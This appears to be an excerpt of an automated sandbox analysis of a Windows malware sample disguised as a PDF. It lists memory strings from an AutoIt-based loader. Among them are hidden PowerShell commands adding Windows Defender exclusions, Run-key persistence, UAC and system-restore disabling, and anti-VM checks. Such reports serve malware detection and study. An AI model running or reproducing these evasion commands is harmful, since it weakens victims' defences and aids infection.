Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_allocateexespaceataddress
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0e0b8
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dd0bffad7d777620aa9cd6ini
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f59570699c8b6657c8t
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d63t
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c.t
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f59570699cbba617cyt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327ctt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cot
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displayname
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("regshot.exe") then
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("taskmgr.exe") then
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bf3a765687634b29cd6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: createobject("wscript.shell").run "
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df365189539|
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953(|2
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6'|!
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ev|p
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6e|o
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6t|~
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6c|m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953k
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c8{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d67{1
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0e&{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6u{_
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6d{n
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953s{}
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdir
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f591
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: array
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6qzz
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe7cde|ze
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\run
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disablesysrestore
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bc2b069
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe7fde
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f80cd4977c777331a38bd69y
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353$y-
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startup
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36c2ab69
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: deadline
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mainpe
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dc2be6ac6f6d73369f:g
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hklm64\software\microsoft\windows nt\currentversion\spp\clients
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disableuac
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_sz
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbldr
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\ihgsvw.exe
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktl
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\users\user~1\appdata\local\temp\folder~1\cdjr.ktl
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\update.vbs
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: const waitonreturn = true
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353version\runonc
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wshshell.run file, hidden, waitonreturn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: set wshshell = createobject("wscript.shell")
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: anti_botkillrh
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6}h
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba446d62649f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9d82cf491
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxservice.exe:
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bc2b069%
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runonce@
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: program managerk
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc2ff391
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd26e8ba4441
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbox.exeists
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: anti_sandbox_vm(
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dc2be6ac6f6d73369fs
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d:\espacefree~
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d:\espacefree
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtray.exel
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: emulator
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cf20f3a14479613e9f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antitask
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\policies\system
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: key3857
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @echo off
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \mshta.exe<
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variables3
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablesnaryx
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablescd23e39753777_
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablesciiarray9767m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \start.cmdd
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \start.cmd720f4bc51747{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f82ff591rosor
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \run.vbs9c720ee97637d6i
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \run.vbsg
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.shell
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startupdir720f4bc51747
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wshshell.run= wscript.
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.quit
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variablescd21f2a6447d6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_dword
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdirrtnamec59767
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: etaskmgr9fd2df5a1406c4
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: byte[uctcreate
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bc2b06967
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: etaskmgr
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: const hidden = 01406c4
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start.lnk
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start.cmd"720f4bc51747
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: set wshshell = wscript.createobject(
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cd21f2a6447d600c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: persistence-
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de2ff3a044776437b5a0h
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cd21f2a6447d600cs
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mshta.exests
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: variables
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemdirte
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execute_vbs
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9de2ff3a044776437b5a0.
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9e32beaa77f76770ci
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regsvcs.exest
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: delay
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mutexc
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mshta.exese
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cd21f2a6447d600c1
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c717\
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f82ff591g
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execute_vbsb
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _msgbox
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c22ff4bc756a603ab4a0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kernel32.dll
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 6_2_00BA3312
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0EBE5 mouse_event, 6_2_00C0EBE5
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C013F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_00C013F2
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006CB1000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerg
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000031BB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ihgsvw.exe Binary or memory string: Shell_TrayWnd
Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.00000000030D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager@K
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002F5A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000003157000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002D69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager\2+
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerk
Source: ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inGetText("Program Manager") = "0" Then
Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager\
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_003EAF0F
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
